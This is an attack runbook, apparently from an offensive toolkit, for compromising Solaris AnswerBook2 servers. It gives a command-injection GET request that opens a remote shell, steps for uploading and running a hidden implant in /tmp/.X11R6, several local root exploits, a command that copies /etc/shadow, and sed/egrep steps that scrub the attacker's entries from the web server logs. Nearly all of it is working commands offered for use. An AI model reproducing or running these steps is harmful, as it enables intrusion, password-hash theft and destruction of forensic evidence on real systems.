#For now, attack from a Linux box. Sun's telnet client seems to be #strlen impaired. Also, Answerbook and netcat don't get along for some reason. #The following substitutions are for the URL: :%s/$/%0A/g :%s/&/%26/g :%s/ /%20/g :%s/;/%3B/g :%s/\$/%24/g #Do the substitutions via the shell, simply copy and paste if vi impaired cat grabit | sed 's/$/%0A/g;s/&/%26/g;s/;/%3B/g;s/ /%20/g;s/+/%2B/g;s/$s/ABC/g;s/\"/\\"/g;s/GET%20/GET /g;s/\\ABC/$s/g;s/%20\\"\\%0A/%20"\\%0A/g;s/^\\"%20/\"%20/g' > seed1 vi seed1 Join lines, make sure there are no spaces delete the last %0a # check for open ports telnet TARGETIP 8080 telnet TARGETIP 8081 # The following URL is seed1 # Let's do it telnet TARGETIP 8888 GET /ab2/@LegacyPageView?ps=`echo%20"\%0A(/bin/ksh<<\%2B%0As=63%0Awhile%20[%20ABC%20-gt%208%20]%0Ado%0A[[%20-S%20/dev/fd/ABC%20]]%20%26%26%20break%0A((s=ABC-1))%0Adone%0A[%20ABC%20-gt%208%20]%20%26%26%20exec%20sh%20-i%20%20/dev/fd/ABC%202>%261%20%26%0A%2B%0A)2>/dev/null%26%0A"%20|%20sed%20's/ABC/$s/g'%20|%20sh` HTTP/1.0 #AB starts two shells which sometimes confuses the output, so #delete the last one. exit;: #not usually needed #toggle crlf #needed toggle outbinary mkdir /tmp/.X11R6; cd /tmp/.X11R6; pwd cat > a.uu <<"EOF" # more nscd.uu EOF uudecode a.uu && uncompress nscd.Z && rm a.uu chmod +x nscd;ls -la PATH=/tmp/.X11R6 P=8080 nscd ../bin/nosy3_client.rh62 -p 8080 TARGETIP ps -ef|grep sh #elevation to root using a local #won't work if X is blocked ls -la /usr/dt/bin/dtprintinfo 3 xp xp_dtprintinfo chmod +x xp PATH=/tmp/.X11R6:/bin:/usr/bin:/sbin:/usr/sbin:/etc:/usr/etc:/usr/ucb echo "PATH=/tmp/.X11R6 P=8081 nscd" | ./xp ../bin/nosy3_client.rh62 -p 8081 TARGETIP #elevation to root using another local #won't work if X is blocked ls -la /usr/openwin/bin/kcms_calibrate 3 xp2 libXmexploit2.6 chmod +x xp2 #xhost + echo "PATH=/tmp/.X11R6 P=8081 nscd" | ./xp2 LOCALIP:0 #wsmoothy mkdir -p /tmp/1291aaab cd /tmp/1291aaab cp ~/efs/{WS|PS}/efs . rm -f fd2 echo "PATH=/tmp/.X11R6 P=8081 nscd" | ./efs ls -lart /var/log/ab2/logs tail /var/log/ab2/logs/errors-8888.log tail -20 /var/log/ab2/logs/access-8888.log wc /var/log/ab2/logs/access-8888.log cp /var/log/ab2/logs/access-8888.log . head -$wc-15 access-8888.log > out tail -20 out cat out > /var/log/ab2/logs/access-8888.log tail -20 /var/log/ab2/logs/access-8888.log # clean previous OP egrep -v '(OLDIP|X11R6|telnet |uudecode|uncompress -f|nscd|user |binary|ingreslock|tags)' access-8888.log > out # clean the logs tail /var/log/ab2/logs/main-8888.log wc /var/log/ab2/logs/main-8888.log cp /var/log/ab2/logs/main-8888.log . head -$wc-1 main-8888.log > out2 tail out2 cat out2 > /var/log/ab2/logs/main-8888.log tail /var/log/ab2/logs/main-8888.log # elevate using BLUESPIRIT rpcinfo -p # in a nosy client 9 #Target IP (0 for listen): 127.0.0.1 #Target Port: 32772 #Local Port: 11111 #Protocol 1 for TCP 2 for UDP: 2 On the local terminal: ./bs -i 127.0.0.1 -h sage -p 11111 -c "PATH=/tmp/.X11R6 P=8081 nscd" ./bs -i 127.0.0.1 -h sage -p 11111 -c "cp /etc/shadow /tmp/.X11R6; chmod 777 /tmp/.X11R6/shadow" ../bin/nosy3_client.rh62 -p 8081 TARGETIP